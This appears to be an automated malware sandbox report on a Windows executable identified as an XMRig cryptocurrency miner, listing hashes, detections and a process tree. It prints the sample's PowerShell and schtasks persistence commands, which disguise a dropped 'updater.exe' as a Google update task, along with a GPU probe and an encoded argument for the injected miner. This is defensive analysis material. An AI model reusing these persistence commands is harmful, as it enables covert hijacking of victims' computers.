Analysis
-
max time kernel
149s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
19-11-2024 16:07
Static task
static1
Behavioral task
behavioral1
Sample
ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe
Resource
win7-20240903-en
General
-
Target
ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe
-
Size
2.0MB
-
MD5
b280cc4e78a7bff8d072713f8b4beb29
-
SHA1
76e5ab8eda5c292b4f602e8a73c037f4623cb172
-
SHA256
ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1
-
SHA512
51e8208fefa8cb51930468aa172f7b07056bf98281d7baf0108537fbab1291f1fc1826e708dec31f57432f7627eb2bccb3d05dc924b1e38f4b290ecb03c7861d
-
SSDEEP
49152:BMJt5dwHjwTFKLpVI1M5crh/XBSgqJXEjvZ80eYcZxXBkK8jXCv:Bot4DrVaEcugqJUDDcZl4C
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
Processes:
ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exeupdater.execonhost.exedescription pid Process procid_target PID 2708 created 1208 2708 ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe 21 PID 2708 created 1208 2708 ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe 21 PID 1920 created 1208 1920 updater.exe 21 PID 1920 created 1208 1920 updater.exe 21 PID 1920 created 1208 1920 updater.exe 21 PID 2288 created 1208 2288 conhost.exe 21 PID 1920 created 1208 1920 updater.exe 21 -
Xmrig family
-
XMRig Miner payload 12 IoCs
Processes:
resource yara_rule behavioral1/memory/2896-37-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2896-38-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2896-40-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2896-42-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2896-44-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2896-46-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2896-48-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2896-50-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2896-52-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2896-54-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2896-56-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2896-58-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid Process 1920 updater.exe -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid Process 3008 taskeng.exe -
Processes:
powershell.exepowershell.exepid Process 2684 powershell.exe 2176 powershell.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid Process procid_target PID 1920 set thread context of 2288 1920 updater.exe 42 PID 1920 set thread context of 2896 1920 updater.exe 49 -
Processes:
resource yara_rule behavioral1/memory/2896-35-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2896-37-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2896-38-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2896-40-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2896-42-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2896-44-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2896-46-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2896-48-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2896-50-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2896-52-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2896-54-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2896-56-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2896-58-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in Program Files directory 4 IoCs
Processes:
cmd.execmd.exeae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exeupdater.exedescription ioc Process File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updater.exe ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 3 IoCs
Processes:
powershell.exeWMIC.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 601935339d3adb01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid Process 2584 schtasks.exe 2876 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exepowershell.exepowershell.exeupdater.exepowershell.execonhost.execonhost.exepid Process 2708 ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe 2708 ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe 2684 powershell.exe 2708 ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe 2708 ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe 2696 powershell.exe 1920 updater.exe 1920 updater.exe 2176 powershell.exe 1920 updater.exe 1920 updater.exe 1920 updater.exe 1920 updater.exe 2288 conhost.exe 2288 conhost.exe 1920 updater.exe 1920 updater.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe 2896 conhost.exe -
Suspicious use of AdjustPrivilegeToken 28 IoCs
Processes:
powershell.exepowershell.exepowershell.exeWMIC.execonhost.exedescription pid Process Token: SeDebugPrivilege 2684 powershell.exe Token: SeDebugPrivilege 2696 powershell.exe Token: SeDebugPrivilege 2176 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2320 WMIC.exe Token: SeIncreaseQuotaPrivilege 2320 WMIC.exe Token: SeSecurityPrivilege 2320 WMIC.exe Token: SeTakeOwnershipPrivilege 2320 WMIC.exe Token: SeLoadDriverPrivilege 2320 WMIC.exe Token: SeSystemtimePrivilege 2320 WMIC.exe Token: SeBackupPrivilege 2320 WMIC.exe Token: SeRestorePrivilege 2320 WMIC.exe Token: SeShutdownPrivilege 2320 WMIC.exe Token: SeSystemEnvironmentPrivilege 2320 WMIC.exe Token: SeUndockPrivilege 2320 WMIC.exe Token: SeManageVolumePrivilege 2320 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2320 WMIC.exe Token: SeIncreaseQuotaPrivilege 2320 WMIC.exe Token: SeSecurityPrivilege 2320 WMIC.exe Token: SeTakeOwnershipPrivilege 2320 WMIC.exe Token: SeLoadDriverPrivilege 2320 WMIC.exe Token: SeSystemtimePrivilege 2320 WMIC.exe Token: SeBackupPrivilege 2320 WMIC.exe Token: SeRestorePrivilege 2320 WMIC.exe Token: SeShutdownPrivilege 2320 WMIC.exe Token: SeSystemEnvironmentPrivilege 2320 WMIC.exe Token: SeUndockPrivilege 2320 WMIC.exe Token: SeManageVolumePrivilege 2320 WMIC.exe Token: SeLockMemoryPrivilege 2896 conhost.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
powershell.exepowershell.exetaskeng.exepowershell.exeupdater.execmd.exedescription pid Process procid_target PID 2684 wrote to memory of 2584 2684 powershell.exe 32 PID 2684 wrote to memory of 2584 2684 powershell.exe 32 PID 2684 wrote to memory of 2584 2684 powershell.exe 32 PID 2696 wrote to memory of 1724 2696 powershell.exe 35 PID 2696 wrote to memory of 1724 2696 powershell.exe 35 PID 2696 wrote to memory of 1724 2696 powershell.exe 35 PID 3008 wrote to memory of 1920 3008 taskeng.exe 37 PID 3008 wrote to memory of 1920 3008 taskeng.exe 37 PID 3008 wrote to memory of 1920 3008 taskeng.exe 37 PID 2176 wrote to memory of 2876 2176 powershell.exe 41 PID 2176 wrote to memory of 2876 2176 powershell.exe 41 PID 2176 wrote to memory of 2876 2176 powershell.exe 41 PID 1920 wrote to memory of 2288 1920 updater.exe 42 PID 2104 wrote to memory of 2320 2104 cmd.exe 47 PID 2104 wrote to memory of 2320 2104 cmd.exe 47 PID 2104 wrote to memory of 2320 2104 cmd.exe 47 PID 1920 wrote to memory of 2896 1920 updater.exe 49 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1208
-
C:\Users\Admin\AppData\Local\Temp\ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe"C:\Users\Admin\AppData\Local\Temp\ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#grrqr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2584
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fwcaup#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:1724
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#grrqr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2876
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe bjecouybve2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:2288
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1996
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe dawljevacynemhmk 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnasCD7XnRLS04n/3PSQs4Y8p6xe1bGyOY+8Z8xp48QJueDeTETxFigw/gLPZY+zEogUGWJwIe0AnFUo5KGehIuSRD8LakQ2BzY76sQikKRo5YsnCeK/QrMiYGenOchYS4YmzB1SO5TDIHyuOuvYhgcxxFuuLlNJu0EGD3BPwarLoVEPwRT4xy6xyOSAVSH1wbSbPT0AK/BX0WsIoOE2qYBbW+WixLTgx7HjhKf0L4MRjwKSBvXZaWontgosxNwPppX9KP6jbKsfw7RDUuDo3lmia8ZSURXiB81FAoYkSLU7IBM0OymWsiXcl9u5srNjQA0k5GNYIMU+Fr+NfudwZ5jbqLyO1Fcpzprom2yaNY2GpW0EyVPrfNHarAXQ7RU0Of1LBbxblkg3LpJLPkqCsoF9v1d5xB21h7eDMgBuz7Q4hpHFL23KscuMzSbz1a80gIlw/62lQaY2MB6rC/wo0N8JLI5mh3ejpdCL2Fu3Uwdf3h2YDJHY49lSbf2BO3+0/sufm7JB2KrBZSJapq4f7Apf2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {060FF692-C18F-4466-A76E-069D636E96D8} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1920
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD55010f82bc4b0b6da95656fb0f6c73d00
SHA1af17a5a72e351c56de85177b75610c749e7197f1
SHA2562fe7c7ac50eb1e1648ae06a4e783d47328a7603c5a77535319fa50d50a9bf30f
SHA5129f47b316a2c3164dbf049efc3b6443c99deb016a4e9d74cad7df1f84a027b70890f89f1bb9dcad7b93d78652f03c86933db1281f7f4f72373f5ef5d0770a21d9
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
2.0MB
MD5b280cc4e78a7bff8d072713f8b4beb29
SHA176e5ab8eda5c292b4f602e8a73c037f4623cb172
SHA256ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1
SHA51251e8208fefa8cb51930468aa172f7b07056bf98281d7baf0108537fbab1291f1fc1826e708dec31f57432f7627eb2bccb3d05dc924b1e38f4b290ecb03c7861d